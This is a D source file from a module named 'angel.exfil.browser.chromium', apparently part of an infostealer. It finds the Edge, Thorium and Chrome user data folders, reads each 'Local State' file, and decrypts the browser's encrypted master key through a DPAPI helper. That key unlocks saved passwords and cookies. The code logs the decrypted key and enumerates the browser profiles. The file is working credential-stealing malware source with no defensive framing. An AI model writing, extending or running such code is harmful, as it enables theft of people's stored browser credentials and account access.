module angel.exfil.browser.chromium.chromium; // Internal imports import angel.utils.constants; import angel.utils.logging; import angel.exfil.browser.chromium.dpapi; // External imports import std.stdio; import std.string; import std.file; import std.base64; import std.Path; import std.format; import std.json; class Chromium { private { string localst; string[] profs = ["Default", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5"]; string[] paths = ["Microsoft\\Edge", "Thorium", "Google\\Chrome"]; } public void entry() { Logger.log(LogLevel.Debug, "Entered chromium"); foreach (path; paths) { string pat = buildPath(Constants.local_appdata, path, "User Data"); if (exists(pat)) { Logger.log(LogLevel.Debug, format("Browser dir %s exists", pat)); this.localst = buildPath(pat, "Local State"); if (exists(localst)) { Logger.log(LogLevel.Debug, format("Local State file %s exists for browser %s", localst, pat)); ubyte[] master_key = this.mkey(); if (master_key is null || master_key.length == 0) { Logger.log( LogLevel.Debug, "Master key contains 0 bytes, possible uncaught/unknown error. Skipping..." ); Logger.log(LogLevel.Debug, format("%s", master_key)); return; } else { Logger.log(LogLevel.Debug, format("Decrypted master key: %s", master_key)); } foreach(prof; profs) { string profpat = buildPath(pat, prof); if (exists(profpat)) { Logger.log(LogLevel.Debug, format("Profile %s exists for browser %s", prof, pat)); } } } } } } private ubyte[] mkey() { string bjson = readText(this.localst); JSONValue json = parseJSON(bjson); string encoded = json["os_crypt"]["encrypted_key"].str; ubyte[] bdecoded = Base64.decode(encoded.strip()); ubyte[] bkey_crypt = bdecoded[5 .. $]; ubyte[] dat = dpapi(bkey_crypt); return dat; } }